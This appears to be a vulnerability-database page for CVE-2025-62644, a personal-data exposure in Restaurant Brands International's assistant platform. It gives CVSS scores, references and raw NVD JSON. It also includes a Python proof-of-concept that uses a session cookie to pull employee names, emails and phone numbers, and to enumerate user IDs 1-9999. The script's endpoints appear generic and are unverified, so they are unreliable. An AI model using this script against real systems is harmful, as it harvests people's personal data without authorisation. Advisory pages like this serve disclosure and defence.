CVE-2025-62644

Description

The Restaurant Brands International (RBI) assistant platform through 2025-09-06 has a Global Store Directory that shares personal information among authenticated users.

CVSS Details

CVSS Score

5.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:rbi:restaurant_brands_international_assistant:*:*:*:*:*:*:*:* - VULNERABLE

RBI Assistant Platform <= 2025-09-06

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62644 PoC - RBI Assistant Platform Information Disclosure
# Vulnerability: Global Store Directory exposes personal information to all authenticated users
# Author: Security Researcher

import requests

# Configuration
BASE_URL = "https://[RBI-assistant-platform-domain]"
SESSION_COOKIE = "authenticated_session_cookie_here"

# Step 1: Authenticate to the RBI assistant platform
# (Requires valid low-privilege user credentials)
auth_headers = {
    "Cookie": f"session={SESSION_COOKIE}",
    "Content-Type": "application/json"
}

# Step 2: Access the Global Store Directory endpoint
# This endpoint returns store information along with associated
# employee personal information without proper access control
directory_url = f"{BASE_URL}/api/global-store-directory"

response = requests.get(directory_url, headers=auth_headers)

if response.status_code == 200:
    data = response.json()
    
    # Step 3: Extract personal information of all users
    # The vulnerability allows any authenticated user to view
    # PII data of other users through the directory
    for store in data.get("stores", []):
        for employee in store.get("employees", []):
            print(f"Name: {employee.get('name')}")
            print(f"Email: {employee.get('email')}")
            print(f"Phone: {employee.get('phone')}")
            print(f"Position: {employee.get('position')}")
            print(f"Store: {store.get('name')}")
            print("---")
else:
    print(f"Access failed: {response.status_code}")
    # Step 4: Alternative - iterate through user IDs to enumerate
    for user_id in range(1, 10000):
        user_url = f"{BASE_URL}/api/users/{user_id}"
        user_response = requests.get(user_url, headers=auth_headers)
        if user_response.status_code == 200:
            user_data = user_response.json()
            print(f"User {user_id}: {user_data}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62644
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62644
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62644/
[4] VulDB https://vuldb.com/cve/CVE-2025-62644
[5] https://archive.today/fMYQp
[6] https://bobdahacker.com/blog/rbi-hacked-drive-thrus/
[7] https://web.archive.org/web/20250906134240/https:/bobdahacker.com/blog/rbi-hacked-drive-thrus
[8] https://www.malwarebytes.com/blog/news/2025/09/popeyes-tim-hortons-burger-king-platforms-have-catastrophic-vulnerabilities-say-hackers
[9] https://www.yahoo.com/news/articles/burger-king-hacked-attackers-impressed-124154038.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62644", "sourceIdentifier": "[email protected]", "published": "2025-10-17T21:15:37.313", "lastModified": "2025-10-31T18:30:33.740", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "The Restaurant Brands International (RBI) assistant platform through 2025-09-06 has a Global Store Directory that shares personal information among authenticated users."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rbi:restaurant_brands_international_assistant:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-09-06", "matchCriteriaId": "706D04A1-2EDB-4713-BA47-EFDC8A86FBA3"}]}]}], "references": [{"url": "https://archive.today/fMYQp", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://bobdahacker.com/blog/rbi-hacked-drive-thrus/", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://web.archive.org/web/20250906134240/https:/bobdahacker.com/blog/rbi-hacked-drive-thrus", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.malwarebytes.com/blog/news/2025/09/popeyes-tim-hortons-burger-king-platforms-have-catastrophic-vulnerabilities-say-hackers", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}, {"url": "https://www.yahoo.com/news/articles/burger-king-hacked-attackers-impressed-124154038.html", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}]}}